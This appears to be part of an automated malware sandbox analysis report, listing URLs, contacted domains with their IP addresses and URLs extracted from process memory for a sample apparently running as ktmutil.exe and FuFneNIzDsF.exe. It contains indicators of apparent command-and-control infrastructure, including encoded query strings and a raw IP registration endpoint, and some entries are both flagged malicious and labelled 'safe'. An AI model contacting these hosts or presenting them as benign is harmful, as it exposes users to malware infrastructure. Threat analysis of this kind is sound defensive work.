                http://www.futurevision.life/hxmz/?DDp=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H768cQaPGnwmWpoBoTXnujTk0fw5ooQYelqhpppqeWfG8SjK30Qts=&SvrLY=3P8lALA0%Avira URL Cloudsafe
                http://www.bzxs.info/v58i/?DDp=IC0zr/ZDVxaNAMf8momja46h3KrCsn6WQsgf7AvDnsA3Q4GKUMSc84jsP15lI7VDCiKPTCHe1ALE8uTr9rusPZ5vALoLFqWsTHRljYdsCfeo56EDBh/tAO+VOLzkgSIV0llmzE8=&SvrLY=3P8lALA0%Avira URL Cloudsafe
                https://erxs.top0%Avira URL Cloudsafe
                https://www.piensasolutions.com/certificado-ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campa0%Avira URL Cloudsafe
                https://iwqb.top0%Avira URL Cloudsafe
                https://yqqb.xyz0%Avira URL Cloudsafe
                https://xuaxs.com0%Avira URL Cloudsafe
                http://www.cesach.net/qutj/0%Avira URL Cloudsafe
                https://gwqqb.com0%Avira URL Cloudsafe
                https://gdlqb.com0%Avira URL Cloudsafe
                https://www.piensasolutions.com?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=piensa0%Avira URL Cloudsafe
                https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=we0%Avira URL Cloudsafe
                https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&amp;utm_medium=link&amp;utm_camp0%Avira URL Cloudsafe
                http://www.econsultoria.online0%Avira URL Cloudsafe
                http://www.migorengya8.click/y3dc/0%Avira URL Cloudsafe
                https://oejqb.com0%Avira URL Cloudsafe
                http://www.mcfunding.org/0598/?SvrLY=3P8lALA&DDp=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4Tu+XiR6NXotGry9ANEeeRCoN4FhbxnBZSnIhm0SzK0MisIZlDjM=0%Avira URL Cloudsafe
                http://www.servannto.site/h26k/0%Avira URL Cloudsafe
                http://www.auto-deals-cz-000.buzz/geci/0%Avira URL Cloudsafe
                https://aqqb.info0%Avira URL Cloudsafe
                http://www.klohk.tech/3m3e/?SvrLY=3P8lALA&DDp=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu0%Avira URL Cloudsafe
                http://www.klohk.tech/3m3e/0%Avira URL Cloudsafe
                http://www.bzxs.info/v58i/0%Avira URL Cloudsafe
                https://mgnxs.com0%Avira URL Cloudsafe
                https://pmqb.xyz0%Avira URL Cloudsafe
                http://www.futurevision.life/hxmz/0%Avira URL Cloudsafe
                https://ncxs.xyz0%Avira URL Cloudsafe
                https://cpjqb.com0%Avira URL Cloudsafe
                http://www.telforce.one/ykhz/?DDp=enw3MzdkIinzycog2d+xaWpEHXfvQHhn7Q0Xf9Uq8WeILZ9WFoLyJZQsqpUbcYSzxWL6OSWVl3hVVR/aqS9N6hR069XLEnbGwgzEaDN1WPABKrmY5eDWHUcJ5DCyIOZX0iwQYxg=&SvrLY=3P8lALA0%Avira URL Cloudsafe
                https://gsxs.info0%Avira URL Cloudsafe
                https://gdxs.info0%Avira URL Cloudsafe
                https://aiqb.top0%Avira URL Cloudsafe
                http://www.telforce.one/ykhz/0%Avira URL Cloudsafe
                https://zeqb.info0%Avira URL Cloudsafe
                http://www.cesach.net/qutj/?SvrLY=3P8lALA&DDp=7+JhtXYoap6hQUSymN1iKxwf+aYIN87BChjykmSFD5cBOLIEN7eTZiNCYJGnmhE2/2tIBPcr+sPRMyccTmjbMYtkzAsmzkJCtDvOtemIhBWnTn54lM+8e5KyjQNsphyX8LHz3fM=0%Avira URL Cloudsafe
                http://www.beingandbecoming.ltd/79tr/0%Avira URL Cloudsafe
                https://znqb.info0%Avira URL Cloudsafe
                https://stzqb.com0%Avira URL Cloudsafe
                https://chqb.info0%Avira URL Cloudsafe
                https://hgqb.xyz0%Avira URL Cloudsafe
                https://www.piensasolutions.com/web-sencilla?utm_source=parking&amp;utm_medium=link&amp;utm_campaign0%Avira URL Cloudsafe
                https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dom0%Avira URL Cloudsafe
                https://ozxs.top0%Avira URL Cloudsafe
                http://www.mcfunding.org/0598/0%Avira URL Cloudsafe
                https://www.piensasolutions.com/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=host0%Avira URL Cloudsafe
                https://ltqb.info0%Avira URL Cloudsafe
                http://www.huiguang.xyz/hv6g/?SvrLY=3P8lALA&DDp=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGBem8ABx5elB2IpCI9aOC0eTdsykMK9iQYMJsZcXRFR0PJFreT4Q=0%Avira URL Cloudsafe
                http://www.beingandbecoming.ltd/79tr/?DDp=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZPygs+MxIMUNH2akCfN7/CzpsZyLj6qmJ1F1UuDNbdqvUipDEiTgU=&SvrLY=3P8lALA0%Avira URL Cloudsafe
                http://www.auto-deals-cz-000.buzz/geci/?SvrLY=3P8lALA&DDp=OUcUcMiN7UFwaCotsW6AMJwehyiwg2RPC2z6ZMYslxYDHrlwQ88kbad89mN4OjllqHqnU6tumNLMTG1picng1VYsD50x98ZhJyamHAiRPzZYiWViTqiNWtopHV1ePKkjcICWV3I=0%Avira URL Cloudsafe
                http://www.030002128.xyz/knx2/0%Avira URL Cloudsafe
                http://www.d63dm.top/rqnz/?DDp=76huNjt+Arc+fPcCbUr8ZcsQaHE6oyRuYOqfGZIequmDvyuWFmMJMF1Z7BKJ7tjr9vaKr64/B4AayP3kwCu5j7kTaNGBLKG6O6VRta8dhdFdziPB3CVN6I/2AxSEUg2RCppISrE=&SvrLY=3P8lALA0%Avira URL Cloudsafe
                https://esfqb.com0%Avira URL Cloudsafe
                https://34.92.79.175:19817/register0%Avira URL Cloudsafe
                http://www.servannto.site/h26k/?DDp=3BjO5l4trS+mOtJOU23IMPLHJrJKWDXXfOCWIFV4tkiUomDH7G5wxffcY7A/EhE+G/r5frF5I7R9nf11AZCcHbS91xJIfYTkMJziJL2bz2TZCx10rmCstVSToHcp1Wua4EZrnYI=&SvrLY=3P8lALA0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                d63dm.top
                		154.23.184.218
                		truetrue
                  		unknown
                  beingandbecoming.ltd
                  		3.33.130.190
                  		truetrue
                    		unknown
                    econsultoria.online
                    		3.33.130.190
                    		truetrue
                      		unknown
                      www.cesach.net
                      		217.76.156.252
                      		truetrue
                        		unknown
                        www.auto-deals-cz-000.buzz
                        		199.59.243.227
                        		truetrue
                          		unknown
                          schedulemassage.xyz
                          		3.33.130.190
                          		truetrue
                            		unknown
                            www.030002128.xyz
                            		161.97.142.144
                            		truetrue
                              		unknown
                              mcfunding.org
                              		3.33.130.190
                              		truetrue
                                		unknown
                                www.bzxs.info
                                		188.114.97.3
                                		truetrue
                                  		unknown
                                  www.huiguang.xyz
                                  		154.92.61.37
                                  		truetrue
                                    		unknown
                                    www.servannto.site
                                    		31.31.196.17
                                    		truetrue
                                      		unknown
                                      www.klohk.tech
                                      		103.224.182.242
                                      		truetrue
                                        		unknown
                                        www.telforce.one
                                        		13.248.169.48
                                        		truetrue
                                          		unknown
                                          migorengya8.click
                                          		198.252.98.54
                                          		truetrue
                                            		unknown
                                            www.futurevision.life
                                            		203.161.49.193
                                            		truetrue
                                              		unknown
                                              www.migorengya8.click
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.mcfunding.org
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.d63dm.top
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.beingandbecoming.ltd
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.econsultoria.online
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown
                                                        www.schedulemassage.xyz
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          http://www.econsultoria.online/azb9/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.migorengya8.click/y3dc/?DDp=ihLGZn7rk3oJmiI0qHBJyF4us9aj83dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tREfAnxyZwa91URYeYbxhv5bPljMHSbrvZtVpRz6w5PNfkG2YKS2Ps=&SvrLY=3P8lALAtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.klohk.tech/3m3e/?SvrLY=3P8lALA&DDp=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cD9BPWmhuph4utiW3Dhv00Os4z+1dRn6W+dMqbZ0s1lU/AMvHhe0=true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.d63dm.top/rqnz/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.bzxs.info/v58i/?DDp=IC0zr/ZDVxaNAMf8momja46h3KrCsn6WQsgf7AvDnsA3Q4GKUMSc84jsP15lI7VDCiKPTCHe1ALE8uTr9rusPZ5vALoLFqWsTHRljYdsCfeo56EDBh/tAO+VOLzkgSIV0llmzE8=&SvrLY=3P8lALAtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.030002128.xyz/knx2/?DDp=cx1F/qf6XWf+sqaNqgWjpjf2u/FJ3U1rCAFJJdWfl5OjgpHNlJW/Jou+UuCSZllgDcZAwgAs0R21dhdWF/X3usItMGO4lmDkyY4fIJ/HYM1kf3catma7zBplk9C6FFtSionVViQ=&SvrLY=3P8lALAtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.futurevision.life/hxmz/?DDp=xeYt+TVrluKccowhuJaDBktUUZBiwtnijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H768cQaPGnwmWpoBoTXnujTk0fw5ooQYelqhpppqeWfG8SjK30Qts=&SvrLY=3P8lALAtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.cesach.net/qutj/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.migorengya8.click/y3dc/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.mcfunding.org/0598/?SvrLY=3P8lALA&DDp=t68BN09iVeqb/IuLF1oa7LGDO07/W7CFIoocHQs3lozqg6PiE4irZB+dVkRcNKn3qqYTfz+U2KKskdRsvGv4Tu+XiR6NXotGry9ANEeeRCoN4FhbxnBZSnIhm0SzK0MisIZlDjM=true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.servannto.site/h26k/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.auto-deals-cz-000.buzz/geci/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.futurevision.life/hxmz/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.klohk.tech/3m3e/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.bzxs.info/v58i/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.telforce.one/ykhz/?DDp=enw3MzdkIinzycog2d+xaWpEHXfvQHhn7Q0Xf9Uq8WeILZ9WFoLyJZQsqpUbcYSzxWL6OSWVl3hVVR/aqS9N6hR069XLEnbGwgzEaDN1WPABKrmY5eDWHUcJ5DCyIOZX0iwQYxg=&SvrLY=3P8lALAtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.telforce.one/ykhz/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.cesach.net/qutj/?SvrLY=3P8lALA&DDp=7+JhtXYoap6hQUSymN1iKxwf+aYIN87BChjykmSFD5cBOLIEN7eTZiNCYJGnmhE2/2tIBPcr+sPRMyccTmjbMYtkzAsmzkJCtDvOtemIhBWnTn54lM+8e5KyjQNsphyX8LHz3fM=true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.beingandbecoming.ltd/79tr/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.mcfunding.org/0598/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.huiguang.xyz/hv6g/?SvrLY=3P8lALA&DDp=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGBem8ABx5elB2IpCI9aOC0eTdsykMK9iQYMJsZcXRFR0PJFreT4Q=true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.auto-deals-cz-000.buzz/geci/?SvrLY=3P8lALA&DDp=OUcUcMiN7UFwaCotsW6AMJwehyiwg2RPC2z6ZMYslxYDHrlwQ88kbad89mN4OjllqHqnU6tumNLMTG1picng1VYsD50x98ZhJyamHAiRPzZYiWViTqiNWtopHV1ePKkjcICWV3I=true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.beingandbecoming.ltd/79tr/?DDp=vB4016rwfH0MxtawL3zGYGaXYsIh8iPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZPygs+MxIMUNH2akCfN7/CzpsZyLj6qmJ1F1UuDNbdqvUipDEiTgU=&SvrLY=3P8lALAtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.030002128.xyz/knx2/true
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.d63dm.top/rqnz/?DDp=76huNjt+Arc+fPcCbUr8ZcsQaHE6oyRuYOqfGZIequmDvyuWFmMJMF1Z7BKJ7tjr9vaKr64/B4AayP3kwCu5j7kTaNGBLKG6O6VRta8dhdFdziPB3CVN6I/2AxSEUg2RCppISrE=&SvrLY=3P8lALAtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.servannto.site/h26k/?DDp=3BjO5l4trS+mOtJOU23IMPLHJrJKWDXXfOCWIFV4tkiUomDH7G5wxffcY7A/EhE+G/r5frF5I7R9nf11AZCcHbS91xJIfYTkMJziJL2bz2TZCx10rmCstVSToHcp1Wua4EZrnYI=&SvrLY=3P8lALAtrue
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://dmqb.infoktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://duckduckgo.com/chrome_newtabktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://wqxs.infoktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://duckduckgo.com/ac/?q=ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://piensasolutions.com/css/parking2.cssktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://anqb.topktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://wmqqb.comktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://piensasolutions.com/imgs/parking/icon-desplegar.jpgktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://nfqb.infoktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://dhqb.infoktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.clarity.ms/tag/ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.piensasolutions.com/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correoktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://egqb.topktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.piensasolutions.com/certificado-ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.google.comktmutil.exe, 00000006.00000002.4569488926.000000000500C000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4571566936.00000000060C0000.00000004.00000800.00020000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.000000000491C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://erxs.topktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://yqqb.xyzktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://xuaxs.comktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://iwqb.topktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://gwqqb.comktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://gdlqb.comktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://hm.baidu.com/hm.js?a1c8cf8ce51343444e7823fb95efe38ektmutil.exe, 00000006.00000002.4569488926.0000000003D34000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000003644000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2740817749.0000000015A54000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.piensasolutions.com?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=piensaktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=wektmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&amp;utm_medium=link&amp;utm_campktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.econsultoria.onlineFuFneNIzDsF.exe, 00000008.00000002.4571453200.0000000005711000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://oejqb.comktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://piensasolutions.com/imgs/parking/icon-ssl-parking.pngktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://aqqb.infoktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.klohk.tech/3m3e/?SvrLY=3P8lALA&DDp=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRuFuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000003FB0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://plus.google.com/u/0/102310483732773374239ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://pmqb.xyzktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://mgnxs.comktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://ncxs.xyzktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cpjqb.comktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://gsxs.infoktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://aiqb.topktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://gdxs.infoktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://www.ecosia.org/newtab/ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://piensasolutions.com/imgs/parking/icon-hosting.pngktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://zeqb.infoktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://piensasolutions.com/imgs/parking/icon-web.pngktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://znqb.infoktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://stzqb.comktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://chqb.infoktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://hgqb.xyzktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
